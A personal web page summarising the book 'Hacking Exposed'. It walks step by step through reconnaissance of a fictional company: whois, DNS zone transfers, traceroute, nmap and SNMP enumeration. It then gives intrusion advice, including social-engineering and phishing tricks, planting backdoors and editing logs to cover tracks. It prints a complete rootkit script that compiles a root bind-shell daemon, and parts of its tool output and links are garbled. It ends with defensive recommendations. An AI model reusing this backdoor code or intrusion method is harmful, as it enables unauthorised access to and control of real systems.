"Hacking Exposed" is a book that claims to illustrate how hacking is done. ... web
server or a mail server, those addresses can easily be found, because they're ...
whereami : HowTo ... Hacker/ library/ Network/ Howto /Hacking Exposed
Hacking Exposed " Where do you want to go today ? "
"Hacking Exposed" is a book that claims to illustrate how hacking is done. By hacking they mean : gaining unallowed access to a system, and consequently try and take some level of control over the system, or retrieve information from it. The correct term for this type of activity is not hacking : it's cracking, or intrusion, or network penetration, or computer crime, or what not, but it is not hacking. But for marketing, "hacking" sounds better.
Some of my opinions about cracking can be found here .
The book further shows how easy it is (or can be) to break in to a networked system. The authors claim this is a warning to unknowing system administrators, and then goes on to explain, in great detail, just how to do it and where to get the tools. So, although the book can serve to educate system administrators about threats to their systems, and how to prevent or cure them, it is at the same time a cookbook for script kiddies. Still, the first few chapters are interesting, because they explain how such a 'hack' is prepared - it offers insight in aspects of data communication, networking and the internet, and shows what a network looks like from the outside. This gives a network administrator an idea of just how 'exposed' his networks and their hosts really are, and that's why I summarize them here, with some examples.
Target First of all, you need to decide who your target will be. script kiddies of course skip this step : they go for the weakest victim they can find in a short time, by blindly scanning the internet for open ports and applying exploits created by others. We will, for this exercise, target an imaginary company, The Silly Software Company. In real life, the target can be any system, for any reason.
Locate the target When you've decided who your target will be, you'll have to be able to locate them on the network - the internet, most often. That means you need to find some of their IP addresses, or at least the IP address of 1 server or other host that belongs to your target company. If they have a web server or a mail server, those addresses can easily be found, because they're needed for mail transfer or for people to visit their web site. On the other hand, they may have their web site hosted by an external company, or have their mail handled by their ISP's mail server, so you will find those IP addresses in stead of the company's. Still, there are a number of ways to find an IP address. Of course, script kiddies - again - skip this step because they blindly strike out at the easiest or nearest victim : they scan for any system that uses the software for which they've downloaded an 'exploit'. If you can't find an IP address easily, the next step may provide some.
Network Reconnaissance or "footprinting' Who is ... The WHOIS databases are maintained by the domain name registrars. Those are the companies that sell domain names such as google.com and bbc.co.uk. The information in these databases can be accessed by tools on your computer (unix/linux : whois), on the WWWeb (example), or via features in certain network administration tools, e.g. Sam Spade. The result may look like this :
microsoft.com Registrant:
Microsoft Corporation (MICROSOFT-DOM) 1 microsoft way One Microsoft Way redmond, WA 98052 US Domain Name: MICROSOFT.COM Administrative Contact: MICROSOFT CORPORATION
[email protected] One Microsoft Way Redmond, WA 98052 US 425 882 8080 fax: 206 703 2641 Technical Contact: MICROSOFT CORPORATION
[email protected] One Microsoft Way Redmond, WA 98052 US 425-882-8080 Record expires on 03-May-2013. Record created on 02-May-1991. Database last updated on 21-Mar-2004 07:27:32 EST. Domain servers in listed order: DNS1.CP.MSFT.NET DNS1.TK.MSFT.NET DNS3.UK.MSFT.NET DNS1.DC.MSFT.NET DNS1.SJ.MSFT.NET
207.46.138.20 207.46.245.230 213.199.144.151 64.4.25.30 65.54.248.222
The information can be helpful to get the 'real life' picture of your target (company name, address, phone number), possibly some additional eamil addresses, and so on. This can be used for educated guesses at user names, passwords, email addresses, or for social engineering (see further). While people are usually good with words, computers are better with numbers. So a system has been developed to translate words (server names, URL's, ...) into numbers (IP addresses), or vice versa. This is called the Domain Name System, and it consists of a number of servers (DNS servers, name servers) that hold databases with computer names and addresses. Computers interrogate ("query") these DNS servers to find the address if they know the name, or find a name when they know the address. The whois info for a domain includes the name servers for this domain, so they're the next thing you'll look in to ... DNS The DNS system can be queried by any computer, because otherwise your web browser would not be able to find the IP address of 'www.playboy.com' when you're surfing the web, or your email program would not be able to figure out where to send your email. Consequently, you can interrogate the DNS system to find out about a company's servers and their addresses. The tool you can use is nslookup, which can be found on any computer with TCP/IP (except those of the Windows 9x family). Say or target has a web site, www.sillysoftware.com. With
nslookup www.sillysoftware.com
We find that this site's IP address is 204.145.220.17. When we nslookup that address, we find it belongs to My Dotcom. Apparently, the Silly Software website is hosted by My DotCom, and we're not interested in them. So, lets see if we can find an other server that belongs to the Silly Software Company, maybe a mail server.
pc01# nslookup # sillysoftware.com Non Authoritive answer name : silly.com addresses : 204.145.220.17 # set type=ANY # silly.com
mail addr = ned.silly.com Authoritive answer can be found from silly.com nameserver = auth.ns.uu.net silly.com nameserver : auth02.ns.uu.net auth.ns.uu.net auth02.ns.uu.net mail.silly.com
internet address = 222.145.220.213 internet address = 81.86.235.2 internet address = 207.204.120.8
And there it is : we find the silly software company's mail server at IP address 207.204.120.8 More from DNS ? So far, we've used our own (default) DNS server and had it query the Silly Software DNS server. That tels us the name and address of the DNS server that is Authoritive for the Silly Software company's silly.com domain. Next , we could also have nslookup interrogate the Silly Software nameserver, by setting ' server auth.ns.uu.net ' . Sometimes, DNS servers allow you to download parts of their database. Normally, they should only allow this to their backup / secondary dns servers ("zone transfer"), but unless the system administrator configured the server to prohibit this, you are able to get the complete DNS database of a server, with the ls -d command in interactive nslookup. You can redirect this information to a file with >> redirection operator. That would give you a complete list of all host names and addresses for a domain - or at least the ones the DNS server knows.
ls -d silly.org [auth02.ns.uu.net] $ORIGIN silly.com. @
sergey scc_gate scc-router switch1 central main_nt mail scc_router fw scc-gate www uunet-gw
6H IN SOA 990570 6H 1H 2w6d 6H )
auth02.ns.uu.net. hostmaster.uu.net. ( ; serial ; refresh ; retry ; expiry ; minimum
6H 6H 6H 6H 6H 6H 6H 6H 6H 6H 6H 6H 6H 6H 6H
auth02.ns.uu.net. auth51.ns.uu.net. 216.222.35.189 207.204.120.25 scc-gate 207.204.197.15 207.204.120.4 207.204.120.5 207.204.120.9 207.204.120.8 scc-router 207.204.120.1 207.204.120.6 204.145.220.17 207.204.197.1
IN IN IN IN IN IN IN IN IN IN IN IN IN IN IN
NS NS A A CNAME A A A A A CNAME A A A A
If a zone transfer fails (it should, really - zone transfers to foreign systems should be disabled by the dns administrator. But sometimes they forget), you can still do a DNS query of type 'ANY', or look for specific records (NS, MX), or just run the unix 'host' command against a list of addresses, host names, or the domain name.
ix:~$ host microsoft.com microsoft.com has address 207.46.197.32 microsoft.com has address 207.46.232.182 microsoft.com mail is handled by 10 maila.microsoft.com. microsoft.com mail is handled by 10 mailb.microsoft.com. microsoft.com mail is handled by 10 mailc.microsoft.com.
Back and Forth Information from whois / RIPE gives you, amongst others, names and IP addresses of name servers, and network ranges registered by the target company. DNS then reveals more names and addresses. IP addresses can again be queried in whois, to reveal the registrant of the network range they belong to. With some back and forth between whois and DNS, you end up with a nice list of (public) networks, hosts, and their IP addresses. If the DNS administrator was careless enough to include internal names and/or private addresses in his public DNS zone, you also get a first look at what the internal LAN may look like.
When you run whois with an ip address, you find the network it belongs to, and other networks owned by the same registrant. here is a Microsoft example again
ix:~$ whois 65.54.240.126 OrgName: OrgID: Address: City: StateProv: PostalCode: Country:
Microsoft Corp MSFT One Microsoft Way Redmond WA 98052 US
NetRange: CIDR:
65.52.0.0 - 65.55.255.255 65.52.0.0/14
So, going back and forth between RIPE (whois) and DNS, it's trivial to find (at least the public parts) of a network.
traceroute During the 'footprinting' process, you've located a number of machines or networks. At this point, you may want to stage a Denial of Service Attack against one of those machines, if that kind of thing is your goal. You may also want to have a closer look at the company's network. Let's see which route an IP packet will follow to go from our system to those machines : we trace a route (with traceroute on Linux or tracert on Windows). This shows all routers between our system and the Silly Software Company's name server. Including the router that connects them to the internet, maybe even their firewall. We can do the same for their mail server, or any other server we know of. traceroute / tracert
Tracing route to mail.silly.com [207.204.120.8] 30 hops max: [...] 17 18 19 20 21 22 [...] Trace
104 104 104 107 *
ms ms ms ms
103 103 123 112 *
ms ms ms ms
110 103 104 107 *
ms ms ms ms
0.so-3-0-0.XL1.NYC1.ALTER.NET [152.63.27.29] 0.so-0-0-0.XR1.NYC1.ALTER.NET [152.63.19.85] 207.ATM7-0.GW11.NYC1.ALTER.NET [152.63.22.145] scc-ext-gw.customer.alter.net [156.131.7.202] Timeout
completed.
Tracing route to central.silly.com [207.204.120.5] 30 hops max: [...] 18 102 ms 103 ms 102 ms 0.so-0-0-0.XR2.NYC1.ALTER.NET [152.63.19.97] 19 110 ms 106 ms 103 ms 208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149] 20 106 ms 107 ms 106 ms scc-ext-gw.customer.alter.net [156.131.7.202] 21 * * * Timeout. [...] Trace completed.
Comparing both routes + the ip addresses of the servers leads to a preliminary conclusion that 156.131.7.202 may be their external gateway (the router that connects them to the internet). This router is on the route to the hosts we're tracing, but we don't get any replies from beyond it. This may indicate they have a router there that doesn't respond to the traceroute packets (a firewall ?). More about how to traceroute hosts behind firewalls, or how to interpret the time-outs, can be found in the man traceroute pages. By matching the traceroute starting port to the number of hops, it might be possible to traceroute beyond the firewall. There exist also a version of traceroute, and some other tools such as firewalker, to traceroute through a firewall.
War Dialing In this day and age, who the fsck uses modems still ? You'd be surprised. Modems are still quite frequently used : in older, yet-to-be-upgraded networks, for specific applications where network connectivity is not (yet) feasible, as a cheap solution for vendor remote assistance (eg to a PBX ..), ... So if you're gonna be war dialing, you still may find a number of modems, connected to PBX's, personal computers, dial-up servers, ... The interesting part about them is that these modem connections by-pass any network firewall. The best war dialing tools were developed for DOS PC's; ToneLoc is a fine example.
Wireless With wireless networks all over the place, war dialing has been reinvented in the form of war driving : looking around for wireless networks, then try to connect to them. Here is a proof of concept. Other forms of wireless data communication (blue-tooth, infrared, ...), especially with support for 'ad-hoc networking', also deserve attention.
Enumeration So far, so good So far, we've collected a number of hostnames and their IP addresses, and we have a rough idea of the IP range The Silly Software Company is using, so we can make an educated guess at other IP addresses they may be using. We have at least 1 email address so we can guess what other email addresses may look like. We know a thing or to about the local network at the Silly Software Company : at least the address of their external (border) router, maybe a bit more (there's probably a firewall). The next step it to collect as much additional information as possible. This is called 'enumerating the network'. There are a lot of tools to be found on the web, but often they are just nice friendly user interfaces for the techniques described below. Websites ... may the source be with you Web sites can be interesting ... First of all, you might find some people's names, email addresses, and other information that can be useful for "social engineering'. The source code of the website might even be more interesting, and it's readily available in your browser (although it me be handier to just download the entire site, and use some text search and filtering tools to find what you're after). Things of interest : scripts. Lazy or incompetent web developers resort to cheap tricks in client-side scripts, eg. values in "hidden' fields or clear text user names and passwords in e.g. a database connect string. Looking at a website's source can reveal interesting information. tools : wget, grep, ... Explore You could first explore a bit more, e.g. by tracing routes to other addresses in the same class. Hosts that don't reply to a ping might still become visible or reveal their hostname. It may also give you a clearer picture of the IP ranges in use. In this case, we might have assumed that the The Silly Software Company uses an IP range of 16 addresses (i.e. 14 hosts) or a range of 32 addresses (30 hosts). The DNS lookup, however, revealed that there are more addresses in use : a set of addresses like 207.204.120.1 to 207.204.120.231. This suggests a complete class C network (nnn.nnn.nnn.1 to 254, subnet mask 255.255.255.0) because the next smaller subnet can only hold hosts (subnet mask 255.255.255.128). A couple of whois queries should be enough to shed some light in this. Note that the DNS lookup also shows a couple of addresses outside this range. When we trace a route to that additional router, scc-router or 207.204.197.15, we notice that it is behind the external gateway - while the previous traces would stop at the external gateway :
19 20 21 Trace
104 ms 108 ms 106 ms 108 ms 112 ms 108 ms completed
105 ms 107 ms 107 ms
208.ATM6-0.GW11.NYC1.ALTER.NET [152.63.22.149] scc-ext-gw.customer.alter.net [157.130.7.202] scc-router.silly.com [207.204.197.15]
This suggest the Silly Software Company has a second network, separate from the 207.204.120.0 network. As the router has address 16 - and routers usually get the first or last address in a range - we assume for now that this is a 15 host subnet with addresses from 207.204.197.1 to 207.204.197.15, subnet mask 255.255.240. We've also found the following interesting looking names :
name
comment
address
comment 2
scc-ext-gw.customer.alter.net
external gateway ?
157.130.7.202
fw
firewall ?
207.204.120.1
scc-router
another router ?
207.204.197.15
apparently in a different address range ...
scc-gate
another gateway / router ?
207.204.120.6
routers usually have addresses at the start or the end of a range, so this would be unusual
switch1
another gateway / router ?
207.204.120.4
uunet-gw
on the ISP's network ?
207.204.197.1
fwext
207.204.197.10
---
---
207.204.120.254 routers usually have addresses at the start or the end of a range, so we could check this one as well
Port Scan We can now use a port scanner to see what ports are open (or blocked, or filtered) on the hosts we already know. This will give us information about what these machines are supposed to be doing, and it may reveal some possible points of attack. nmap (Network Mapper)is a popular port scanner. It's output may look something like this :
Starting nmap 3.45 ( http://www.insecure.org/nmap ) at 2004-03-21 12:03 Interesting ports on www.my.com (82.283.162.210): (The 1648 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 26/tcp open unknown 53/tcp open domain 80/tcp open http 110/tcp open pop-3 143/tcp open imap 443/tcp open https 995/tcp open pop3s Nmap run completed -- 1 IP address (1 host up) scanned in 135.290 seconds
nmap can also scan IP ranges, so it can be used to find other hosts on the network as well. Use your knowledge of IP addressing and subnetting to define a suitable range, or (if you have the time or lack the knowledge) scan everything. On top of that, and among other features, nmap can make a first guess of the operating system used on the hosts you're scanning, so there's another interesting piece if information out there. Here's a summary of a number of scans. Nmap has several options, all of which can reveal something particular about the targeted network.
# nmap 3.48 scan initiated Sat Mar 27 12:43:12 2004 as: nmap -sS -O -P0 -R -p1352 -oN log 207.204.120.1-15 Interesting ports on scc-int-gw-e0.silly.com (207.204.120.1): PORT STATE SERVICE 1352/tcp filtered lotusnotes Device type: general purpose Running: Microsoft Windows NT/2K/XP OS details: Microsoft Windows NT 4.0 SP 6a + hotfixes [repeated at every host] Interesting ports on firewall2.silly.com (207.204.120.2): (The 65535 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 747/tcp filtered fujitsu-dev 1352/tcp closed lotusnotes
Interesting ports on 207.204.120.3: (The 65535 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 747/tcp filtered fujitsu-dev 1352/tcp closed lotusnotes 1723/tcp filtered pptp
Interesting ports on switch1.silly.com (207.204.120.4): (The 65535 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 183/tcp filtered ocbinder 1352/tcp filtered lotusnotes
Interesting ports on central.silly.com (207.204.120.5): (The 65535 ports scanned but not shown below are in state: filtered) PORT STATE SERVICE 1352/tcp open lotusnotes 5631/tcp open pcanywheredata 5632/tcp closed pcanywherestat 5900/tcp open vnc Device type: general purpose Running: Sun Solaris 2.X|7, Microsoft Windows NT/2K/XP OS details: Sun Solaris 2.6 - 7 (SPARC), Microsoft Windows NT 4.0 SP 6a + hotfixes
Interesting ports on scc_gate.silly.com (207.204.120.6): (The 65535 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 180/tcp filtered ris 747/tcp filtered fujitsu-dev 1352/tcp filtered lotusnotes
Interesting ports on 207.204.120.7:
PORT STATE SERVICE 1352/tcp filtered lotusnotes Interesting ports on mail.silly.com (207.204.120.8): PORT STATE SERVICE 1352/tcp open lotusnotes Interesting ports on main_nt.silly.com (207.204.120.9): PORT STATE SERVICE 1352/tcp filtered lotusnotes
[etc ..]
All 65535 scanned ports on 207.204.120.24 are: closed All 65535 scanned ports on sergey.silly.com (207.204.120.25) are: closed All 65535 scanned ports on 207.204.120.26 are: closed All 65535 scanned ports on 207.204.120.27 are: closed Interesting ports on 207.204.120.28: (The 65535 ports scanned but not shown below are in state: closed) PORT STATE SERVICE 1650/tcp filtered nkd All 65535 scanned ports on 207.204.120.29 are: closed All 65535 scanned ports on 207.204.120.30 are: closed
# Nmap run completed at Sat Mar 27 14:42:47 2004 -30 IP addresses (30 hosts up) scanned in 3409.766 seconds
The result is not bad: we get a list of hosts in the Silly Software network, their IP address, and a number of interesting ports, some even with Remote Administration Services already listening. We can assume the have a firewall, because nmap evaluates a number of ports as 'filtered'. And of course, the hostname firewall2.silly.com is a dead giveaway :-) . One more interesting point that show up in the nmap output : machine with IP address 207.204.120.25 is called sergey.silly.com. Sergey is a man's name. Could they be using public IP addresses for (at least some of ) their employees workstations ? And are workstations named after their user ? Maybe we can send an email to
[email protected], see what gives. Also, they have that second 207.204.197.0 / 28 subnet that could be worth a closer look. And the DNS resolution of some of the scanned addresses turn out interesting sounding names such as 'fw' (firewall ?), 'fwext' (external firewall ?), 'switch' (a switch with remote management ? an other router ?) and 'main_nt' (a Windows NT domain controller ?) ... And so on ... Banner Grabbing Now that you know the open ports, you can try to find out what software is being used for those services. A quick and easy way to do that is to telnet to the host on that port. Sometimes, the software replies with some sort of welcome message, or at least a command prompt, that may tell what software is behind it. Some ports scanners will do this for you (recent versions of nmap do), or you may look on the internet for banner grabbing tools. Nessus is a know name here. Nessus can also "test" the services in question to see if they are vulnerable to common exploits. Saves you the trouble of identifying vulnerabilities and finding suitable exploits yourself. Here are some examples of what 'banners' may look like, and what they tell you. You may find yourself welcome to a Linux system
Welcome to SuSE Linux 7.1 kernel 2.2.14 Have a lot of fun
or an old Lotus Notes Domino Server
SMTP gateway for Lotus Domino r 4.6 _
or a pop 3 server ...
+OK POP3 [cppop 9.9] at [209.51.159.225]
This information can later be used to look up to what kind of attack, exploit, ... this particular version of that specific software packet is vulnerable. Of course, things like VPN and PCAnywhere services are tempting found during a portscan : all you need for those is a VPN or PCAnywhere client, and you can check whether the system administrator forgot to remove the default accounts and change the factory settings. If so, these services are an open door into the network. The filtered ports tell you which services are running on the host, but they're firewalled - it may be complicated to connect to them. The response may refer to the host itself, or from a NAT router / firewall between you and the scanned target. Ports that are closed tell you that the machine is not used for the services these ports represent, or that a firewall is blocking any attempt to connect to these ports without telling the system that initiates the connection. snmp snmp, the simple network management protocol, is a protocol to monitor devices remotely, over the network. System administrators use it to monitor routers, switches, computers, printers, ... If the snmp service is accessible from the outside, it can be used to collect a complete description of the system in question. So it's worth checking. snmp services are usually configured with a default "public" community that allows read access. The community name serves as a password, and sys admins forget to change it, so ... snmp version 3 supports more secure authentication mechanisms. Maybe it's time to upgrade - or at least check your community names. snmp uses UDP so it doesn't usually show up in a default (tcp) port scan. You can explicitly scan UDP ports, or just try to access snmp on the target(s) and see if it responds.
for target in $list_of_targets; do snmpget -v1 -c public $target system.sysUpTime.0 done
For those hosts where you can access snmp, you can use snmpwalk or bulksnmpwalk to walk the entire snmp tree.
for item in $list_of_snmp_targets; do snmpwalk $item ; done
snmp data is organized in modules ("MIB"), and depending on the system you're interrogating, it is useful to specify a module to get specific information. For instance, you can specify the LanMgr-Mib-II-MIB - Windows LanManager MIB to retrieve shared directories, sessions, user account names, ... from a Windows system. On routers, you may be interested in the snmp ip subtree, to find out about routing tables and address translation. Some samples of snmp output : (partial) description of router (partial) description of a Linux system (partial) description of a Windows system a list of user accounts on a Windows system Service specific information With the information gathered so far, you may have discovered new ways to find out more about the network you're aiming at. For instance, if you found that some hosts are using netbios, this can be used to retrieve additional information about user names, computer names, possibly also network shares and so on. This page shows netbios vulnerabilities in this respect. To get some insight in the LAN layout, you might send an email to
[email protected], get a reply, and read the headers to see how that reply got from the sender (with his IP address and/or host name) to the mail servers. Or use one of the email addresses you've found so far.
Received: from PC_212
(adsl2256.ppp.my.com [207.201.179.14])
Asking for a receipt, and look at the headers when you get it, can also tell you a few things about how mail reaches its destination at The Silly Software Company and thus (partially) illustrate the layout of the network. Social Engineering So far, we've only collected information that is readily available, because the internet as it is would nor be able to function without it, and information that can be readily retrieved if sloppy sysadmins forget to take precautions against it. Next, all we did is put 2 and 2 together. To find out more, we'd have to either target specific holes in the security, or use so-called "Social engineering" Social Engineering is kind of an euphemism. To fill the gaps in the information you've collected so far, you may resort to dirty tricks such as call the receptionist at Silly Software Company, tell her you're the helpdesk and could she please tell you her password because you need to check something. She might just give it. She may also tell you the login name and password of her boss who is such a moron and she always needs to help him whenever he's at a loss with some computer thing. You may also start hanging out at the place where the Silly Software Techies hang out for lunch, for happy hour, or on Friday after work, and hear them tell stories about how stupid their colleagues are, or so. Stories that may contain interesting details about the IT systems in the company. Interesting details that help you understand what your target looks like, and where the weak points may be. An other approach could be to visit news groups and forums, and look for entries related to the company your targeting, or names of its employees. One of the network administrators might have asked for help regarding a problem that could be of particular interest. So, social engineering has nothing to do with engineering, nothing to do with network protocols or data communication - it's just exploiting human weakness, but it's called social engineering to make it fit the picture of the intelligent, technology oriented wizz that can get in to any system. Nonetheless, it goes to show that the human factor can be one of the weak points in a well protected system, so it's good to be aware of it.
Point of Attack At this point, we have an idea what the local network at the Silly Software Company may look like, we know where on the internet we can find them, we have some indications of the software they're running, we have some background information about the company, and maybe it's employees and so on. Time to decide how to proceed. A lot depends on what you're after. We could target one of the servers, e.g. the mail server or the system with hostname 'gate', either as the final goal or as a way to penetrate deeper in the network (they may accept actions from their own servers that they don't accept from external systems, so some level of control over that server may get us further ...). Mail servers are a popular target, because they hold user accounts : logins, passwords. They must be publicly accessible for mail to be delivered, and they are also trusted by the other hosts on the network, so they can be used as point of entry. They also hold the mail messages, if that's what you're after. Or mail messages may contain information that can help you penetrate deeper in the network. We have some information about ports that we can connect to (and the services that will reply, maybe the operating systems, etc). That may open opportunities, if there are known security issues with that software. In a case like this, it may be worth a try to get a pcAnywhere client or VNC client and try to connect to the hosts listening for PCAnywhere or VNC. If the network administrator did a sloppy job, some factory settings (default users, passwords, ...) may still be active, and you walk right in.
Method of Attack The method of attack will be adapted to the point of attack, discussed previously, because it is, at least partially, dictated by the software you find on the target system. There are several ways. Maybe you can locate and retrieve the password file, so when you have that, you can try to connect to the system as a legitimate user, and take it from there. Or maybe one of the services is susceptible to a buffer overflow exploit, which might allow you to open a shell (a command prompt) from where you can access the system, maybe create a superuser account for yourself, or so. There's also root kits, collections of scripts that will help you get access with 'root' (system administrator) privileges on the system you're targeting. Or maybe you have sufficient access to drop a 'Trojan Horse' on the system, that will let you right in next time. You're first attack may be also aimed at just collecting additional information for future attacks : grab a password list, find a way to get a packet sniffer on the network to read the data that are being transmitted, etc. An other typical method is to gain access to the network with limited privileges, as guest, or with anonymous FTP or something similar, then apply some tricks or exploit some sysadmin sloppiness to upgrade your account, upload a root kit, steal the password file, ... in order to get control ("own the system"). Here's a descriptin of how an ftp server with some configuration mistakes resulted in complete 'root' access to a server : How we defaced apache.org.
Leave the back door open After you've gone through all this trouble, you don't want to shut yourself out, so you'll leave a way to sneak in more easily next time. Create a user account (and remember the password), leave a back door program that you can connect to without hassle, etc. Tools for this kind of activity can be readily found on the web. Of course, you will have to trust the guy who created them : his virus crehttp://www.dataloss.net/papers/how.defaced.apache.org.txtation tool or trojan construction tool may well include a few lines of code that create a backdoor on your own system as well. :-) Here are a couple of examples I found without too much trouble. I haven't tried them so I don't know if they will work. I iInclude them because they're easy to understand examples of how features of the operating system on the target can be exploited if the sys admin is a bit naive. For systems with less naive sysadmins, I'm sure there are more sophisticated tricks out there.
Windows NT Windows NT (and other Microsoft Windows systems) still know the autoexec.bat. This is a script that is automatically executed every time the system (re-)boots. They also have the AT command, that can be used to have commands/scripts/programs executed at a given date/time or with a given schedule. This is often considered God's gift to crackers, as it can be used to have commands, scripts, programs, .... executed on the targeted system. One can imagine that an intruder tries to add a few lines to the autoexec.bat, then waits for the system to be rebooted (or get it to reboot by causing it to crash). An other fine tool is getadmin.exe, a program that uses a flaw in Windows NT to add the user account of your choice to the Administrators group, thus giving that account full Administrator privileges. getadmin.exe is a bit outdated (the flaw in Windows is patched) - but you get the idea. And there are probably other tools out there. An other way of doing it may be like this : hacking NT, using FTP to upload files to the targeted machine. Once you are Administrator, there is no limit to what you can do. With VBS, you can execute any administrator task on the remote machine, including creating new accounts (in case the one you're using is found and removed), or changing passwords. Linux / Unix The following trick is supposed to work on Unix / Linux systems : upload a script that contains the source code (in C) of a backdoor program, and some shell commands to compile and run it on the targeted system, using that systems own c compiler (gcc, usually present by default on any Linux / Unix-like system).
#!/bin/sh # Fearless Rootkit R-Type v0.1 # Coded by Merlion # # If you do, you do so at your OWN risk cat > /tmp/rootd.c <string.h> <netdb.h> <netinet/in.h> <sys/types.h> <sys/socket.h> <unistd.h>
void die(char *error); main(int argc, char **argv) { pid_t pid, sid; int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen; unsigned short int mcon; unsigned short int port; char *rbuf, *rmode; struct sockaddr_in Client, Server; if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket"); if (argc != 3) die("Usage"); memset(&Server, 0, sizeof(Server)); Server.sin_family=AF_INET; port=905; mcon=5; Server.sin_port=htons(port); Server.sin_addr.s_addr=htonl(INADDR_ANY); if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0) die("No socket options set"); if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0) die("Could not bind socket"); if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()"); pid=fork(); if (pid < 0) die("Initial fork() failed"); if (pid>0) exit(0); if ((chdir("/")) < 0) die("Could not set working directory"); if ((setsid()) < 0) die("setsid() failed in creating daemon"); umask(0); close(STDIN_FILENO); close(STDOUT_FILENO); close(STDERR_FILENO);
while(1) { socklen=sizeof(Client); if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); clipid=getpid(); serpid=fork(); if (serpid > 0) waitpid(0, &stat, 0); dup2(sockcli, 1); execl("/bin/sh","sh",(char *)0); } close(sockcli); }
/*
void die(char *error) { fprintf(stderr, "%s\n", error); exit(1); }
EOF gcc -o /bin/rootd /tmp/rootd.c rm -f /tmp/rootd.c /bin/rootd echo "Rootd successfully installed" exit 0
more ... More elaborate stuff can be found on the Web, like here: Fearless http://www.packetstormsecurity.org/UNIX/penetration/rootkits/ : Unix tools http://www.packetstormsecurity.org/NT/ : Windows NT tools more tutorials, howto's, and tools
Next ... So, you have access to the Silly Software Company's resources. Now what ? The decent thing to do would be to warn them about the security holes in their system, e.g. by sending the system administrator an email explaining what you've done. If you send the mail from within their system, like from the sys admin's own email account, it's more impressive, and it proofs you're not joking. The black hat approach would now be to use their system for your own benefit, like steal information, or install an FTP server to distribute 'warez', or use their computers as zombies for a Denial of Service attack against your next victim, or use their mail system to start spreading viruses, or run your next intrusion from one of their computers so that it won't be traced back to you, or whatever. Typically, the intruder will also try yo cover his tracks by modifying log files, create hidden files or folders to cover any stuff that has been uploaded, or place his tools in folders with normal sounding names or use file names that may look as if they belong to the system. A system administrator would need to know his system quite well to notice these changes.
Shortcuts There are a couple of ways to shortcut the above procedure. For starters, it helps if you're already on the inside. 80 % of all 'intrusions' are done from within, i.e. by employees. That saves the trouble of having to penetrate the network from the outside. Also, employees have accounts already, so their goal would be to find a way to get superuser privileges (privilege escalation) , or find holes, inconsistencies, mistakes in the access privileges that would allow them access to information they were not intended to see or modify. At the least, they have only to look at their own account to see what format usernames and passwords have, which might help. Penetrating a network is also easier if someone lets you in. You may send emails to The Silly Software Company's employees and make it look as if they come from the system administrator (you know his email address from the DNS lookup !). If you can convince them to execute a certain program ("here's a patch that will repair the problem you've had with your computer. just open the attachment" - that should work : everyone has had problems with computers before ...), you can try and have them install a backdoor that you can use to get in.
Conclusion The availability of DNS and RIPE information is part of the design. DNS, RIPE ('whois'), and other online databases are necessary for the internet to function. There is also nothing wrong with servers having publicly accessible ports / services - you can't run a web server without allowing people to connect to its port 80. On the other hand, all this information combined can tell an attacker more than you expect. Lists of networks, IP addresses and routes may allow an attacker to draw a map of your networks and make educated guesses about additional private networks, routes, and possibly vpn tunnels. Private IP addresses can be used for address spoofing so packets appear to be coming from a trusted network. User names and email addresses can be used in social engineering or to make educated guesses about account names. A list of installed software or running services, and their patch level (eg from snmp) greatly simplifies the search for vulnerabilities or exploits. If someone has a list of user accounts, all he needs to do is find a matching password - way easier and faster than having to guess (brute-force, word list, ...) user name password combinations. So, while you can not avoid having some info publicly accessible, a security aware system administrator should really consider what information is to be made public, and to whom - and take steps to implement that in stead of accepting whatever defaults came with the package. A few simple steps will greatly reduce your exposure : use generic email addresses (eg
[email protected] in stead of
[email protected]) don't let DNS servers do zone transfers to other servers except your own don't show internal hosts / addresses in public DNS. Use separate servers for internal and external addresses. Don't let public DNS servers do recursive lookups on your private DNS servers. replace those default passwords (and snmp communities) disable services you don't need use a firewall and access control lists to limit communication to only those source and destination addresses / networks / hosts that need to be talking to each other log connection and log-in attempts and check the logs regularly
Disclaimer
Names and addresses have been changed. Any similarity with existing persons, companies or events is unintended and purely coincidental. The purpose of this article is to illustrate how cracking and intrusion can be done, so that people can check if any of the above methods could be applied against their systems. This article should not, in any way, be seen as a manual for or encouragement to criminal activity of any kind.
